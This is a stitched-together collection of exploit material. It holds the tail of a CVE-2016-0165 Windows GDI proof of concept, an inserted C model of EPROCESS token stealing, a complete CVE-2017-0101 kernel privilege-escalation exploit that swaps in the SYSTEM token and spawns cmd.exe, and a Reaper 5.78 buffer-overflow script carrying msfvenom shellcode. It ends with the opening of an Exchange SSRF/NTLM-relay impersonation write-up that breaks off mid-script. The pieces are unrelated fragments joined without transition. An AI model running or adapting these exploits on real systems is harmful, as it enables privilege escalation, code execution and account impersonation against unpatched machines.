// xxOutputBitmapBits();
std::cout << "MODIFY EXTEND BITMAP HEIGHT..." << std::endl;
POCDEBUG_BREAK();
bReturn = xxPoint(iExtHeight, 0xFFFFFFFF);
if (!bReturn)
{
break;
}
std::cout << "LOCATE EXTEND BITMAP..." << std::endl;
bReturn = xxGetExtendPalette();
if (!bReturn)
{
break;
}
if ((pBmpHunted[iExtpScan0] & 0xFFF) != 0x00000CCC)
{
bReturn = FALSE;
std::cout << "FAILED: " << (PVOID)pBmpHunted[iExtpScan0] << std::endl;
break;
}
iMemHunted = (pBmpHunted[iExtpScan0] & ~0xFFF) - 0x1000;
std::cout << "HUNTED PAGE: " << (PVOID)iMemHunted << std::endl;
std::cout << "FIX HUNTED POOL HEADER..." << std::endl;
bReturn = xxFixHuntedPoolHeader();
if (!bReturn)
{
break;
}
std::cout << "FIX HUNTED BITMAP OBJECT..." << std::endl;
bReturn = xxFixHuntedBitmapObject();
if (!bReturn)
{
break;
}
std::cout << "-------------------" << std::endl;
std::cout << "PRIVILEGE ELEVATION" << std::endl;
std::cout << "-------------------" << std::endl;
xxPrivilegeElevation();
std::cout << "-------------------" << std::endl;
std::cout << "DELETE BITMAPS (2)..." << std::endl;
xxDeleteBitmaps();
std::cout << "DELETE ACCTABS (3)..." << std::endl;
xxDeleteAcceleratorTables();
bReturn = TRUE;
} while (FALSE);
if (!bReturn)
{
std::cout << GetLastError() << std::endl;
}
std::cout << "-------------------" << std::endl;
getchar();
return 0;
}
INT main(INT argc, CHAR *argv[])
{
POC_CVE20160165();
return 0;
}
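Added example (mine; not part of any of the PoCs on this page): a user-mode model of the token-stealing walk that the Loader+0x10f0..0x112d shellcode of the CVE-2017-0263 PoC and the xxGetTarPROCESS / xxModifyTokenPointer / xxRecoverTokenPointer functions of the CVE-2016-0165 and CVE-2017-0101 PoCs implement. EPROCESS is reduced to the three fields the PoCs touch, at the Windows 7 x86 offsets they hard-code (UniqueProcessId 0xb4, ActiveProcessLinks 0xb8, Token 0xf8); the process list, the token objects, their spacing and the "kernel memory" they live in are constructed here, and rd32/wr32 stand in for the PoCs' xxPointToGet/xxPointToHit primitive. It also carries through the two details the PoCs handle differently: the shellcode bumps the System token's OBJECT_HEADER.PointerCount (and eax,0FFFFFFF8h / add [eax-18h],2), while the GDI PoCs instead restore the original token before the process exits.

```c
/* Added example: user-mode model of the EPROCESS walk and token swap.
 * All addresses are offsets into a constructed arena; no kernel is touched. */
#include <stdint.h>
#include <string.h>
#include <stdio.h>

#define OFF_EPROCESS_UniqueProcessId 0x0b4
#define OFF_EPROCESS_ActiveLinks     0x0b8   /* LIST_ENTRY: Flink at +0, Blink at +4 */
#define OFF_EPROCESS_Token           0x0f8   /* EX_FAST_REF: pointer | 3-bit ref count */
#define OBJECT_HEADER_SIZE           0x18    /* x86 OBJECT_HEADER; PointerCount is its first DWORD */
#define EPROCESS_STRIDE              0x200   /* assumption: spacing of the modelled objects */

static uint8_t g_kmem[0x2000];               /* constructed "kernel" arena */

static uint32_t rd32(uint32_t addr) { uint32_t v; memcpy(&v, g_kmem + addr, 4); return v; }
static void     wr32(uint32_t addr, uint32_t v) { memcpy(g_kmem + addr, &v, 4); }

static uint32_t eprocess_addr(unsigned i)   { return 0x100 + i * EPROCESS_STRIDE; }
static uint32_t token_body_addr(unsigned i) { return 0x1000 + i * 0x100 + OBJECT_HEADER_SIZE; }

/* Build a circular ActiveProcessLinks list; entry 0 is System (pid 4). Every
 * process gets its own token object with OBJECT_HEADER.PointerCount = 1. */
static void build_process_list(const uint32_t *pids, unsigned n)
{
    memset(g_kmem, 0, sizeof g_kmem);
    for (unsigned i = 0; i < n; i++) {
        uint32_t ep   = eprocess_addr(i);
        uint32_t next = eprocess_addr((i + 1) % n);
        uint32_t prev = eprocess_addr((i + n - 1) % n);
        wr32(ep + OFF_EPROCESS_UniqueProcessId, pids[i]);
        wr32(ep + OFF_EPROCESS_ActiveLinks,     next + OFF_EPROCESS_ActiveLinks);
        wr32(ep + OFF_EPROCESS_ActiveLinks + 4, prev + OFF_EPROCESS_ActiveLinks);
        wr32(ep + OFF_EPROCESS_Token, token_body_addr(i) | 3);
        wr32(token_body_addr(i) - OBJECT_HEADER_SIZE, 1);
    }
}

/* xxGetTarPROCESS: follow Flink from System, subtract the field offset to get
 * from the embedded LIST_ENTRY back to the EPROCESS (CONTAINING_RECORD), stop
 * when the list wraps. The shellcode's "cmp [ebx+ecx-4],eax" is the same test:
 * UniqueProcessId sits 4 bytes before ActiveProcessLinks. */
static uint32_t find_eprocess_by_pid(uint32_t sys_eprocess, uint32_t pid)
{
    uint32_t ep = sys_eprocess;
    do {
        if (rd32(ep + OFF_EPROCESS_UniqueProcessId) == pid)
            return ep;
        uint32_t flink = rd32(ep + OFF_EPROCESS_ActiveLinks);
        if (flink == 0)
            return 0;
        ep = flink - OFF_EPROCESS_ActiveLinks;
    } while (ep != sys_eprocess);
    return 0;
}

static uint32_t pointer_count_of(uint32_t token_ref)
{
    return rd32((token_ref & ~7u) - OBJECT_HEADER_SIZE);
}

/* xxModifyTokenPointer plus the shellcode's reference fix-up: point the target
 * at System's token and add 2 to that token's OBJECT_HEADER.PointerCount.
 * Returns the target's original Token value so it can be put back. */
static uint32_t steal_token(uint32_t target, uint32_t sys_eprocess)
{
    uint32_t old = rd32(target + OFF_EPROCESS_Token);
    uint32_t sys = rd32(sys_eprocess + OFF_EPROCESS_Token);
    wr32(target + OFF_EPROCESS_Token, sys);
    uint32_t hdr = (sys & ~7u) - OBJECT_HEADER_SIZE;   /* and eax,0FFFFFFF8h ; [eax-18h] */
    wr32(hdr, rd32(hdr) + 2);
    return old;
}

/* xxRecoverTokenPointer: restore before exit, or teardown releases a token the
 * process never owned. */
static void restore_token(uint32_t target, uint32_t old_token)
{
    wr32(target + OFF_EPROCESS_Token, old_token);
}

/* Whole sequence on a constructed four-process list. Returns a bitmask of the
 * checks that held (0xf = found, swapped, refcount bumped, restored). */
static unsigned demo_token_steal(uint32_t target_pid)
{
    static const uint32_t pids[] = { 4, 368, 1234, 5678 };   /* constructed */
    build_process_list(pids, 4);
    uint32_t sys = eprocess_addr(0);
    uint32_t tar = find_eprocess_by_pid(sys, target_pid);
    if (tar == 0)
        return 0;
    unsigned ok = 1;
    uint32_t sys_tok = rd32(sys + OFF_EPROCESS_Token);
    uint32_t before  = pointer_count_of(sys_tok);
    uint32_t saved   = steal_token(tar, sys);
    ok |= (rd32(tar + OFF_EPROCESS_Token) == sys_tok) << 1;
    ok |= (pointer_count_of(sys_tok) == before + 2) << 2;
    restore_token(tar, saved);
    ok |= (rd32(tar + OFF_EPROCESS_Token) == saved) << 3;
    return ok;
}

int main(void)
{
    printf("pid 1234: checks 0x%x (expect 0xf)\n", demo_token_steal(1234));
    printf("pid 9999: checks 0x%x (not in list, expect 0)\n", demo_token_steal(9999));
    return 0;
}
```

Two things the model makes visible that the PoCs only imply: the walk terminates because the list is circular and the search starts at System, so a pid that is not present comes back as 0 instead of looping forever; and the Token field is an EX_FAST_REF whose low three bits are a reference count, which is why the shellcode masks them off before touching the OBJECT_HEADER 0x18 bytes below the token body. The offsets are those of Windows 7 x86 only; every other build needs its own.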
#include <Windows.h>
#include <wingdi.h>
#include <stdio.h>
#include <stdlib.h>
#include <iostream>
#include <Psapi.h>
#pragma comment(lib, "psapi.lib")
#define POCDEBUG 0
#if POCDEBUG == 1
#define POCDEBUG_BREAK() getchar()
#elif POCDEBUG == 2
#define POCDEBUG_BREAK() DebugBreak()
#else
#define POCDEBUG_BREAK()
#endif
CONST LONG maxTimes = 2000;
CONST LONG tmpTimes = 3000;
static HBITMAP hbitmap[maxTimes] = { NULL };
static HPALETTE hpalette[maxTimes] = { NULL };
static DWORD iMemHunted = NULL;
static HBITMAP hBmpHunted = NULL;
static PDWORD pBmpHunted = NULL;
static HPALETTE hPalExtend = NULL;
CONST LONG iExtPaleHmgr = 809;
CONST LONG iExtcEntries = 814;
CONST LONG iExtPalColor = 828;
typedef struct _PATRECT {
INT nXLeft;
INT nYLeft;
INT nWidth;
INT nHeight;
HBRUSH hBrush;
} PATRECT, *PPATRECT;
typedef BOOL (WINAPI *pfPolyPatBlt)(HDC hdc, DWORD rop, PPATRECT pPoly, DWORD Count, DWORD Mode);
static
BOOL xxCreateBitmaps(INT nWidth, INT Height, UINT nbitCount)
{
POCDEBUG_BREAK();
for (LONG i = 0; i < maxTimes; i++)
{
hbitmap[i] = CreateBitmap(nWidth, Height, 1, nbitCount, NULL);
if (hbitmap[i] == NULL)
{
return FALSE;
}
}
return TRUE;
}
static
BOOL xxDeleteBitmaps(VOID)
{
BOOL bReturn = FALSE;
POCDEBUG_BREAK();
for (LONG i = 0; i < maxTimes; i++)
{
bReturn = DeleteObject(hbitmap[i]);
hbitmap[i] = NULL;
}
return bReturn;
}
static
BOOL xxRegisterWndClasses(LPCSTR menuName)
{
POCDEBUG_BREAK();
CHAR buf[0x10] = { 0 };
for (LONG i = 0; i < tmpTimes; i++)
{
WNDCLASSEXA Class = { 0 };
sprintf(buf, "CLS_%d", i);
Class.lpfnWndProc = DefWindowProcA;
Class.lpszClassName = buf;
Class.lpszMenuName = menuName;
Class.cbSize = sizeof(WNDCLASSEXA);
if (!RegisterClassExA(&Class))
{
return FALSE;
}
}
return TRUE;
}
static
BOOL xxDigHoleInWndClasses(LONG b, LONG e)
{
BOOL bReturn = FALSE;
CHAR buf[0x10] = { 0 };
for (LONG i = b; i < e; i++)
{
sprintf(buf, "CLS_%d", i);
bReturn = UnregisterClassA(buf, NULL);
}
return bReturn;
}
static
BOOL xxUnregisterWndClasses(VOID)
{
BOOL bReturn = FALSE;
CHAR buf[0x10] = { 0 };
for (LONG i = 0; i < tmpTimes; i++)
{
sprintf(buf, "CLS_%d", i);
bReturn = UnregisterClassA(buf, NULL);
}
return bReturn;
}
static
BOOL xxCreatePalettes(ULONG cEntries)
{
BOOL bReturn = FALSE;
POCDEBUG_BREAK();
PLOGPALETTE pal = NULL;
// 0x64*4+0x58+8=0x1f0
pal = (PLOGPALETTE)malloc(sizeof(LOGPALETTE) + cEntries * sizeof(PALETTEENTRY));
pal->palVersion = 0x300;
pal->palNumEntries = cEntries;
for (LONG i = 0; i < maxTimes; i++)
{
hpalette[i] = CreatePalette(pal);
if (hpalette[i] == NULL)
{
bReturn = FALSE;
break;
}
bReturn = TRUE;
}
free(pal);
return bReturn;
}
static
BOOL xxDeletePalettes(VOID)
{
BOOL bReturn = FALSE;
POCDEBUG_BREAK();
for (LONG i = 0; i < maxTimes; i++)
{
bReturn = DeleteObject(hpalette[i]);
hpalette[i] = NULL;
}
return bReturn;
}
static
BOOL xxRetrieveBitmapBits(VOID)
{
pBmpHunted = static_cast<PDWORD>(malloc(0x1000));
ZeroMemory(pBmpHunted, 0x1000);
LONG index = -1;
LONG iLeng = -1;
POCDEBUG_BREAK();
for (LONG i = 0; i < maxTimes; i++)
{
iLeng = GetBitmapBits(hbitmap[i], 0x1000, pBmpHunted);
if (iLeng < 0xCA0)
{
continue;
}
index = i;
std::cout << "LOCATE: " << '[' << i << ']' << hbitmap[i] << std::endl;
hBmpHunted = hbitmap[i];
break;
}
if (index == -1)
{
std::cout << "FAILED: " << (PVOID)(-1) << std::endl;
return FALSE;
}
return TRUE;
}
static
VOID xxOutputBitmapBits(VOID)
{
POCDEBUG_BREAK();
for (LONG i = 0; i < 0x1000 / sizeof(DWORD); i++)
{
std::cout << '[';
std::cout.fill('0');
std::cout.width(4);
std::cout << i << ']' << (PVOID)pBmpHunted[i];
if (((i + 1) % 4) != 0)
{
std::cout << " ";
}
else
{
std::cout << std::endl;
}
}
std::cout.width(0);
}
static
BOOL xxGetExtendPalette(HPALETTE hHandle)
{
LONG index = -1;
POCDEBUG_BREAK();
for (LONG i = 0; i < maxTimes; i++)
{
if (hpalette[i] != hHandle)
{
continue;
}
index = i;
std::cout << "LOCATE: " << '[' << i << ']' << hpalette[i] << std::endl;
hPalExtend = hpalette[i];
break;
}
if (index == -1)
{
std::cout << "FAILED: " << (PVOID)(-1) << std::endl;
return FALSE;
}
return TRUE;
}
static
BOOL xxPoint(LONG id, DWORD Value)
{
LONG iLeng = 0x00;
pBmpHunted[id] = Value;
iLeng = SetBitmapBits(hBmpHunted, 0xD00, pBmpHunted);
if (iLeng < 0xD00)
{
return FALSE;
}
return TRUE;
}
static
BOOL xxPointToHit(LONG addr, PVOID pvBits, DWORD cb)
{
UINT iLeng = 0;
pBmpHunted[iExtPalColor] = addr;
iLeng = SetBitmapBits(hBmpHunted, 0xD00, pBmpHunted);
if (iLeng < 0xD00)
{
return FALSE;
}
PVOID pvTable = NULL;
UINT cbSize = (cb + 3) & ~3; // sizeof(PALETTEENTRY) => 4
pvTable = malloc(cbSize);
memcpy(pvTable, pvBits, cb);
iLeng = SetPaletteEntries(hPalExtend, 0, cbSize / 4, (PPALETTEENTRY)pvTable);
free(pvTable);
if (iLeng < cbSize / 4)
{
return FALSE;
}
return TRUE;
}
static
BOOL xxPointToGet(LONG addr, PVOID pvBits, DWORD cb)
{
UINT iLeng = 0;
pBmpHunted[iExtPalColor] = addr;
iLeng = SetBitmapBits(hBmpHunted, 0xD00, pBmpHunted);
if (iLeng < 0xD00)
{
return FALSE;
}
PVOID pvTable = NULL;
UINT cbSize = (cb + 3) & ~3; // sizeof(PALETTEENTRY) => 4
pvTable = malloc(cbSize);
iLeng = GetPaletteEntries(hPalExtend, 0, cbSize / 4, (PPALETTEENTRY)pvTable);
memcpy(pvBits, pvTable, cb);
free(pvTable);
if (iLeng < cbSize / 4)
{
return FALSE;
}
return TRUE;
}
static
BOOL xxFixHuntedPoolHeader(VOID)
{
DWORD szInputBit[0x100] = { 0 };
CONST LONG iTrueBmpHead = 937;
szInputBit[0] = pBmpHunted[iTrueBmpHead + 0];
szInputBit[1] = pBmpHunted[iTrueBmpHead + 1];
BOOL bReturn = FALSE;
bReturn = xxPointToHit(iMemHunted + 0x000, szInputBit, 0x08);
if (!bReturn)
{
return FALSE;
}
return TRUE;
}
static
BOOL xxFixHuntedBitmapObject(VOID)
{
DWORD szInputBit[0x100] = { 0 };
szInputBit[0] = (DWORD)hBmpHunted;
BOOL bReturn = FALSE;
bReturn = xxPointToHit(iMemHunted + 0x08, szInputBit, 0x04);
if (!bReturn)
{
return FALSE;
}
bReturn = xxPointToHit(iMemHunted + 0x1c, szInputBit, 0x04);
if (!bReturn)
{
return FALSE;
}
return TRUE;
}
static
DWORD_PTR
xxGetNtoskrnlAddress(VOID)
{
DWORD_PTR AddrList[500] = { 0 };
DWORD cbNeeded = 0;
EnumDeviceDrivers((LPVOID *)&AddrList, sizeof(AddrList), &cbNeeded);
return AddrList[0];
}
static
DWORD_PTR
xxGetSysPROCESS(VOID)
{
DWORD_PTR Module = 0x00;
DWORD_PTR NtAddr = 0x00;
Module = (DWORD_PTR)LoadLibraryA("ntkrnlpa.exe");
NtAddr = (DWORD_PTR)GetProcAddress((HMODULE)Module, "PsInitialSystemProcess");
FreeLibrary((HMODULE)Module);
NtAddr = NtAddr - Module;
Module = xxGetNtoskrnlAddress();
if (Module == 0x00)
{
return 0x00;
}
NtAddr = NtAddr + Module;
if (!xxPointToGet(NtAddr, &NtAddr, sizeof(DWORD_PTR)))
{
return 0x00;
}
return NtAddr;
}
CONST LONG off_EPROCESS_UniqueProId = 0x0b4;
CONST LONG off_EPROCESS_ActiveLinks = 0x0b8;
static
DWORD_PTR
xxGetTarPROCESS(DWORD_PTR SysPROC)
{
if (SysPROC == 0x00)
{
return 0x00;
}
DWORD_PTR point = SysPROC;
DWORD_PTR value = 0x00;
do
{
value = 0x00;
xxPointToGet(point + off_EPROCESS_UniqueProId, &value, sizeof(DWORD_PTR));
if (value == 0x00)
{
break;
}
if (value == GetCurrentProcessId())
{
return point;
}
value = 0x00;
xxPointToGet(point + off_EPROCESS_ActiveLinks, &value, sizeof(DWORD_PTR));
if (value == 0x00)
{
break;
}
point = value - off_EPROCESS_ActiveLinks;
if (point == SysPROC)
{
break;
}
} while (TRUE);
return 0x00;
}
CONST LONG off_EPROCESS_Token = 0x0f8;
static DWORD_PTR dstToken = 0x00;
static DWORD_PTR srcToken = 0x00;
static
BOOL
xxModifyTokenPointer(DWORD_PTR dstPROC, DWORD_PTR srcPROC)
{
if (dstPROC == 0x00 || srcPROC == 0x00)
{
return FALSE;
}
// get target process original token pointer
xxPointToGet(dstPROC + off_EPROCESS_Token, &dstToken, sizeof(DWORD_PTR));
if (dstToken == 0x00)
{
return FALSE;
}
// get system process token pointer
xxPointToGet(srcPROC + off_EPROCESS_Token, &srcToken, sizeof(DWORD_PTR));
if (srcToken == 0x00)
{
return FALSE;
}
// modify target process token pointer to system
xxPointToHit(dstPROC + off_EPROCESS_Token, &srcToken, sizeof(DWORD_PTR));
// just test if the modification is successful
DWORD_PTR tmpToken = 0x00;
xxPointToGet(dstPROC + off_EPROCESS_Token, &tmpToken, sizeof(DWORD_PTR));
if (tmpToken != srcToken)
{
return FALSE;
}
return TRUE;
}
static
BOOL
xxRecoverTokenPointer(DWORD_PTR dstPROC, DWORD_PTR srcPROC)
{
if (dstPROC == 0x00 || srcPROC == 0x00)
{
return FALSE;
}
if (dstToken == 0x00 || srcToken == 0x00)
{
return FALSE;
}
// recover the original token pointer to target process
xxPointToHit(dstPROC + off_EPROCESS_Token, &dstToken, sizeof(DWORD_PTR));
return TRUE;
}
static
VOID xxCreateCmdLineProcess(VOID)
{
STARTUPINFO si = { sizeof(si) };
PROCESS_INFORMATION pi = { 0 };
si.dwFlags = STARTF_USESHOWWINDOW;
si.wShowWindow = SW_SHOW;
WCHAR wzFilePath[MAX_PATH] = { L"cmd.exe" };
BOOL bReturn = CreateProcessW(NULL, wzFilePath, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi);
if (bReturn) CloseHandle(pi.hThread), CloseHandle(pi.hProcess);
}
static
VOID xxPrivilegeElevation(VOID)
{
BOOL bReturn = FALSE;
do
{
DWORD SysPROC = 0x0;
DWORD TarPROC = 0x0;
POCDEBUG_BREAK();
SysPROC = xxGetSysPROCESS();
if (SysPROC == 0x00)
{
break;
}
std::cout << "SYSTEM PROCESS: " << (PVOID)SysPROC << std::endl;
POCDEBUG_BREAK();
TarPROC = xxGetTarPROCESS(SysPROC);
if (TarPROC == 0x00)
{
break;
}
std::cout << "TARGET PROCESS: " << (PVOID)TarPROC << std::endl;
POCDEBUG_BREAK();
bReturn = xxModifyTokenPointer(TarPROC, SysPROC);
if (!bReturn)
{
break;
}
std::cout << "MODIFIED TOKEN TO SYSTEM!" << std::endl;
std::cout << "CREATE NEW CMDLINE PROCESS..." << std::endl;
POCDEBUG_BREAK();
xxCreateCmdLineProcess();
POCDEBUG_BREAK();
std::cout << "RECOVER TOKEN..." << std::endl;
bReturn = xxRecoverTokenPointer(TarPROC, SysPROC);
if (!bReturn)
{
break;
}
bReturn = TRUE;
} while (FALSE);
if (!bReturn)
{
std::cout << "FAILED" << std::endl;
}
}
INT POC_CVE20170101(VOID)
{
std::cout << "-------------------" << std::endl;
std::cout << "POC - CVE-2017-0101" << std::endl;
std::cout << "-------------------" << std::endl;
BOOL bReturn = FALSE;
HDC hdc = NULL;
HBITMAP hbmp = NULL;
HBRUSH hbru = NULL;
pfPolyPatBlt pfnPolyPatBlt = NULL;
do
{
hdc = GetDC(NULL);
std::cout << "GET DEVICE CONTEXT: " << hdc << std::endl;
if (hdc == NULL)
{
break;
}
std::cout << "CREATE PATTERN BRUSH BITMAP..." << std::endl;
hbmp = CreateBitmap(0x36D, 0x12AE8F, 1, 1, NULL);
if (hbmp == NULL)
{
break;
}
std::cout << "CREATE PATTERN BRUSH..." << std::endl;
hbru = CreatePatternBrush(hbmp);
if (hbru == NULL)
{
break;
}
std::cout << "CREATE BITMAPS (1)..." << std::endl;
bReturn = xxCreateBitmaps(0xE8C, 1, 8);
if (!bReturn)
{
break;
}
std::cout << "REGISTER WINDOW CLASSES..." << std::endl;
bReturn = xxRegisterWndClasses("KCUF");
if (!bReturn)
{
break;
}
std::cout << "DELETE BITMAPS (1)..." << std::endl;
xxDeleteBitmaps();
std::cout << "CREATE BITMAPS (2)..." << std::endl;
bReturn = xxCreateBitmaps(0xC98, 1, 8);
if (!bReturn)
{
break;
}
std::cout << "CREATE PALETTES (1)..." << std::endl;
bReturn = xxCreatePalettes(0x64);
if (!bReturn)
{
break;
}
std::cout << "UNREGISTER WINDOW CLASSES (H)..." << std::endl;
xxDigHoleInWndClasses(1000, 2000);
std::cout << "POLYPATBLT..." << std::endl;
POCDEBUG_BREAK();
pfnPolyPatBlt = (pfPolyPatBlt)GetProcAddress(GetModuleHandleA("gdi32"), "PolyPatBlt");
if (pfnPolyPatBlt == NULL)
{
break;
}
PATRECT ppb[1] = { 0 };
ppb[0].nXLeft = 0x100;
ppb[0].nYLeft = 0x100;
ppb[0].nWidth = 0x100;
ppb[0].nHeight = 0x100;
ppb[0].hBrush = hbru;
pfnPolyPatBlt(hdc, PATCOPY, ppb, 1, 0);
std::cout << "LOCATE HUNTED BITMAP..." << std::endl;
bReturn = xxRetrieveBitmapBits();
if (!bReturn)
{
break;
}
// std::cout << "OUTPUT BITMAP BITS..." << std::endl;
// xxOutputBitmapBits();
std::cout << "LOCATE EXTEND PALETTE..." << std::endl;
bReturn = xxGetExtendPalette((HPALETTE)pBmpHunted[iExtPaleHmgr]);
if (!bReturn)
{
break;
}
if ((pBmpHunted[iExtcEntries]) != 0x64 ||
(pBmpHunted[iExtPalColor] & 0xFFF) != 0x00000E54)
{
bReturn = FALSE;
std::cout << "FAILED: " << (PVOID)pBmpHunted[iExtPalColor] << std::endl;
break;
}
iMemHunted = (pBmpHunted[iExtPalColor] & ~0xFFF);
std::cout << "HUNTED PAGE: " << (PVOID)iMemHunted << std::endl;
std::cout << "FIX HUNTED POOL HEADER..." << std::endl;
bReturn = xxFixHuntedPoolHeader();
if (!bReturn)
{
break;
}
std::cout << "FIX HUNTED BITMAP OBJECT..." << std::endl;
bReturn = xxFixHuntedBitmapObject();
if (!bReturn)
{
break;
}
std::cout << "-------------------" << std::endl;
std::cout << "PRIVILEGE ELEVATION" << std::endl;
std::cout << "-------------------" << std::endl;
xxPrivilegeElevation();
std::cout << "-------------------" << std::endl;
std::cout << "DELETE BITMAPS (2)..." << std::endl;
xxDeleteBitmaps();
std::cout << "DELETE PALETTES (1)..." << std::endl;
xxDeletePalettes();
bReturn = TRUE;
} while (FALSE);
if (bReturn == FALSE)
{
std::cout << GetLastError() << std::endl;
}
POCDEBUG_BREAK();
std::cout << "DELETE BRUSH..." << std::endl;
DeleteObject(hbru);
DeleteObject(hbmp);
std::cout << "UNREGISTER WINDOW CLASSES (1)..." << std::endl;
xxUnregisterWndClasses();
std::cout << "-------------------" << std::endl;
getchar();
return 0;
}
INT main(INT argc, CHAR *argv[])
{
POC_CVE20170101();
return 0;
}
# Exploit Title: Reaper 5.78 - Local Buffer Overflow
# Exploit Author: bzyo
# CVE: CVE-2018-9131
# Date: 2018-03-30
# Vulnerable Software: Reaper 5.78
# Vendor Homepage: https://www.reaper.fm/
# Version: 5.78
# Software Link: https://www.reaper.fm/download.php
# Tested On: Windows 7 x86
#
# lots of bad chars, use alpha_mixed with register
# bad chars \x00\x0a\x0d and everything above \x80
#
# PoC:
# 1. generate reaper578.txt, copy contents to clipboard
# 2. open app, select Options, select Preferences
# 3. choose ReaScript
# 4. paste reaper578.txt contents into both fields:
# 'Custom path to Python dll directory'
# 'Force ReaScript to use specific Python dll'
# 5. pop calc
#
import struct
filename="reaper578.txt"
junk = "A"*95
#0x10042e5a : push esp # ret | ascii {PAGE_EXECUTE_READ} [elastique.dll]
eip = struct.pack('<I',0x10042e5a)
#msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -e x86/alpha_mixed BufferRegister=ESP -f c
#Payload size: 440 bytes
calc = ("\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
"\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
"\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x6b\x58\x6d\x52\x35\x50"
"\x35\x50\x65\x50\x75\x30\x6b\x39\x6a\x45\x70\x31\x4f\x30\x65"
"\x34\x4c\x4b\x56\x30\x76\x50\x4c\x4b\x46\x32\x56\x6c\x6e\x6b"
"\x73\x62\x55\x44\x4c\x4b\x71\x62\x51\x38\x36\x6f\x4f\x47\x53"
"\x7a\x56\x46\x66\x51\x49\x6f\x4e\x4c\x67\x4c\x55\x31\x63\x4c"
"\x57\x72\x54\x6c\x57\x50\x79\x51\x4a\x6f\x64\x4d\x67\x71\x49"
"\x57\x4a\x42\x48\x72\x71\x42\x52\x77\x4c\x4b\x52\x72\x46\x70"
"\x4e\x6b\x71\x5a\x47\x4c\x6c\x4b\x30\x4c\x42\x31\x34\x38\x69"
"\x73\x37\x38\x77\x71\x5a\x71\x32\x71\x4c\x4b\x62\x79\x35\x70"
"\x75\x51\x39\x43\x6e\x6b\x71\x59\x32\x38\x4d\x33\x45\x6a\x61"
"\x59\x4c\x4b\x74\x74\x6c\x4b\x43\x31\x4b\x66\x75\x61\x59\x6f"
"\x4c\x6c\x6b\x71\x48\x4f\x46\x6d\x36\x61\x6f\x37\x34\x78\x69"
"\x70\x71\x65\x69\x66\x77\x73\x33\x4d\x58\x78\x77\x4b\x61\x6d"
"\x35\x74\x62\x55\x58\x64\x71\x48\x6e\x6b\x33\x68\x66\x44\x63"
"\x31\x6a\x73\x55\x36\x4c\x4b\x36\x6c\x70\x4b\x6e\x6b\x51\x48"
"\x35\x4c\x65\x51\x7a\x73\x6e\x6b\x44\x44\x6e\x6b\x57\x71\x38"
"\x50\x6d\x59\x53\x74\x56\x44\x75\x74\x43\x6b\x33\x6b\x43\x51"
"\x63\x69\x32\x7a\x36\x31\x49\x6f\x69\x70\x53\x6f\x43\x6f\x63"
"\x6a\x6e\x6b\x56\x72\x6a\x4b\x6c\x4d\x73\x6d\x52\x4a\x46\x61"
"\x4c\x4d\x4e\x65\x6e\x52\x35\x50\x63\x30\x75\x50\x70\x50\x45"
"\x38\x54\x71\x6c\x4b\x72\x4f\x4f\x77\x4b\x4f\x39\x45\x4d\x6b"
"\x6c\x30\x6d\x65\x4d\x72\x52\x76\x72\x48\x4f\x56\x4f\x65\x6d"
"\x6d\x6d\x4d\x4b\x4f\x38\x55\x47\x4c\x43\x36\x43\x4c\x46\x6a"
"\x6d\x50\x49\x6b\x4d\x30\x63\x45\x67\x75\x4f\x4b\x67\x37\x66"
"\x73\x70\x72\x70\x6f\x32\x4a\x33\x30\x72\x73\x69\x6f\x58\x55"
"\x33\x53\x50\x61\x50\x6c\x52\x43\x46\x4e\x52\x45\x33\x48\x70"
"\x65\x37\x70\x41\x41")
#lol 1337
fill = "D"*(1337 - len(calc))
buffer = junk + eip + calc + fill
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()
0x00 Introduction
This is the third case in the Top 5 Interesting Cases of 2018 series. Each of these vulnerabilities has a factor that sets it apart from the roughly 1,400 reports released this year. Today we analyze an Exchange vulnerability that lets an authenticated user impersonate other users on the Exchange server.
In a December post, Dustin Childs of ZDI mentioned an Exchange vulnerability that allows a user on an Exchange server to impersonate anyone on that server. This vulnerability could be used for intranet hijacking, but it is more likely to be used for phishing, data theft, or other malware operations. As part of the Top 5 Interesting Cases of 2018 series, this article digs into the details of this SSRF (server-side request forgery) vulnerability and shows how the impersonation process is implemented.
0x01 Vulnerability Analysis
This vulnerability is caused by a combination of an SSRF vulnerability and another flaw. Exchange lets a user specify the URL needed for a push subscription, and the server then attempts to send notifications to that URL. The problem is that Exchange Server connects using CredentialCache.DefaultCredentials.
In Exchange Web Services, CredentialCache.DefaultCredentials runs as NT AUTHORITY\SYSTEM. As a result, the Exchange server sends its NTLM hash to the attacker's server. Exchange Server also sets the following registry key by default: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\DisableLoopbackCheck = 1.
This makes it possible to use these NTLM hashes for HTTP authentication. For example, the hashes can be used to access Exchange Web Services (EWS). Because the connection runs at the NT AUTHORITY\SYSTEM level, the attacker obtains a "privileged" session with TokenSerializationRight and can then impersonate a user through a SOAP request header.
The following impersonates the administrator using SID S-1-5-21-4187549019-2363330540-1546371449-500.
0x02 Vulnerability Exploitation
We use a couple of Python scripts for the demonstration.
serverhttp_relayntlm.py - obtains the NTLM hash from the inbound connection and authenticates to EWS
exch_ews_pushsubscribe.py - issues the PushSubscription EWS call that makes Exchange call back to serverhttp_relayntlm.py
These scripts can be downloaded here. The python-ntlm module is also required.
The first step of the exploit is to obtain the SID of the user we want to impersonate. One possible way to do that is as follows:
1. Log in to OWA as an authenticated user. Here we log in as "attacker".
2. Next, create a new folder. In this example we use Temfold. Click the "Permissions..." option in the context menu.
3. Here, add the e-mail address of the person you want to impersonate. Our target is victim@contoso.local:
4. Press F12 and select the Network tab. Then select the "Permissions..." option in the new folder's context menu.
5. Check the response of the first service.svc?action=GetFolder request. Look at:
Body-responsemessages-items-0-folders-0-permissionset-permissions-n-userid-sid
In this example n is 2 (the most recent), but you can check all of them to find the right one. PrimarySmtpAddress should be the intended victim. If the response does not contain a PermissionSet entry, check another service.svc?action=GetFolder request.
6. Use this SID in serverhttp_relayntlm.py to impersonate the victim. You also need to choose a TCP port on the attacker-controlled machine that is unlikely to be blocked, so that the Exchange server can make the outbound connection. For example, TCP port 8080 may be available. Now let's modify the following lines of serverhttp_relayntlm.py with the real information.
# port of the HTTP server
